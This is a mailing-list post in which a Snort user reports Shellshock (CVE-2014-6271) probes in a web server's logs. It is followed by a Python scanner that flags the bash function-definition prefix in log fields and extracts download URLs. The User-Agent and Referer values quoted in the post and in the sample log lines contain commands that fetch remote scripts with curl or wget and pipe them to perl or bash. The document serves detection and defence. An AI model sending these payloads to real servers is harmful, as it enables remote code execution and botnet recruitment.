[Snort-users] Odd http requests in the logs

Richard Geddes richardcgeddes at ...11827...
Sun Nov 2 23:23:51 EST 2014


Hello,

I received a few (9) events in my web logs with the following fields:

agent : "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl"

referrer : "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl"

I downloaded index.png, and it turns out to be a base64-encoded Perl
script that has comments about a botnet.  It seems to target Apache.

I'm using Snort with Snort VRT Rules on a pfSense firewall, and pfSense,
Snort, and the Snort rules are up-to-date.

Snort seems to be passing these requests on to my web server, and it
seems to me they should be blocked.

I don't know enough about how web servers and log handlers process this
data to determine if it's a threat.

Is there a way to tell Snort to block HTTP requests with these fields?
The source of the malicious file should probably be regex'd in case
there are alternate sources of this file.

Thanks,
Richard

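The check Richard asks for, as an added example that is not his code and not a Snort or pfSense rule: a Python scan over Apache combined-format access log lines (the format is an assumption; the post shows only the extracted agent and referrer fields) that flags the Shellshock (CVE-2014-6271) function-definition prefix `() {` in the Referer, User-Agent or request line, tolerates the whitespace variants seen in the wild, and pulls every URL out of the payload so the download source is recorded whatever host it points at, which is the regex the post suggests. The log lines below are constructed, built around the header values quoted above plus one benign request and one whitespace-variant probe with a different source host.

```python
import re
from dataclasses import dataclass, field
from typing import Optional

# Assumed Apache "combined" log format (the original post does not show the raw line):
# host ident user [time] "request" status bytes "referer" "user-agent"
# Apache escapes embedded quotes as \", so each quoted field allows backslash escapes.
COMBINED_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<request>(?:[^"\\]|\\.)*)" (?P<status>\d{3}) (?P<bytes>\S+) '
    r'"(?P<referer>(?:[^"\\]|\\.)*)" "(?P<agent>(?:[^"\\]|\\.)*)"\s*$'
)

# Shellshock trigger: an empty function definition at the start of the value.
# Whitespace is optional everywhere, so "() { :; };", "(){ :;};" and "() {" all match.
SHELLSHOCK_RE = re.compile(r'^\s*\(\s*\)\s*\{')

# Any URL inside the payload, regardless of host, so alternate download sources are kept.
URL_RE = re.compile(r'(?:https?|ftp)://[^\s"\'|;<>]+')

# Constructed sample input: one benign line, one built from the header values in the
# post, one whitespace-variant probe carrying a different (documentation-range) host.
SAMPLE_LOG = [
    '198.51.100.7 - - [02/Nov/2014:21:14:05 -0500] "GET /index.html HTTP/1.1" 200 5123 '
    '"-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/33.0"',
    '203.0.113.9 - - [02/Nov/2014:22:03:44 -0500] "GET / HTTP/1.1" 200 5123 '
    '"() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" '
    '"() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl"',
    '203.0.113.9 - - [02/Nov/2014:22:03:45 -0500] "GET /cgi-bin/test.cgi HTTP/1.1" 404 209 '
    '"-" "(){ :;}; /bin/bash -c \\"wget http://192.0.2.5/x.sh -O /tmp/x\\""',
]


@dataclass
class Hit:
    host: str           # client that sent the request
    field: str          # which logged field carried the payload
    value: str          # the raw payload as logged
    urls: list = field(default_factory=list)  # download sources found in the payload


def parse_combined(line: str) -> Optional[dict]:
    """Split one combined-format line into named fields; None if it does not parse."""
    m = COMBINED_RE.match(line)
    return m.groupdict() if m else None


def inspect_line(line: str) -> list:
    """Return one Hit per logged field that starts with the bash function prefix."""
    rec = parse_combined(line)
    if rec is None:
        return []
    hits = []
    for name in ("referer", "agent", "request"):
        value = rec[name]
        if SHELLSHOCK_RE.search(value):
            hits.append(Hit(rec["host"], name, value, URL_RE.findall(value)))
    return hits


def scan(lines) -> list:
    """Inspect every line and flatten the hits."""
    return [h for line in lines for h in inspect_line(line)]


def download_sources(lines) -> set:
    """All distinct URLs referenced by flagged payloads, for blocklists or rule content."""
    return {url for h in scan(lines) for url in h.urls}


if __name__ == "__main__":
    for h in scan(SAMPLE_LOG):
        print(f"{h.host} {h.field}: {h.value!r} -> {h.urls}")
    print("sources:", sorted(download_sources(SAMPLE_LOG)))
```

Matching on the `() {` prefix rather than on the one host seen in the logs is the point: the payload after the prefix is attacker-chosen, so a rule keyed to `202.28.77.53` misses the next probe, while the function-definition prefix has to be present for the bash bug to fire. A hit in the access log only shows the request reached Apache; whether the header was ever handed to bash depends on whether something like mod_cgi passed it into a process environment, which is a question for the server configuration, not the log.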